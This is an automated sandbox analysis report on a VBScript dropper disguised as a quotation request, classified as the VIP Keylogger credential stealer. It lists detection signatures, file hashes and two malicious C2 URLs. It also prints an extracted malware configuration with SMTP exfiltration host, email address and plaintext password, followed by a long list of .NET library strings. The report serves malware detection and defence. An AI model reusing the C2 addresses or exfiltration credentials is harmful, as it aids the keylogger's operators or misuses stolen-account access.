Windows Analysis Report
RFQ-5120240930 VENETA PESCA SRL.vbs

Overview

General Information

Sample name: RFQ-5120240930 VENETA PESCA SRL.vbs
Analysis ID: 1522516
MD5: d969df11d11c9dfafbe27aacd81dcb82
SHA1: 83748eb8a719110829c744930c7a0b88d8c1f107
SHA256: ef18b54b8f37d475de25d891221866bb252f710f141a5107f9ba39fb110fc0d7
Tags: vbsuser-abuse_ch
Infos:

Detection

VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

barindex
Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2453863224.00007FFD34430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2453863224.00007FFD34430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
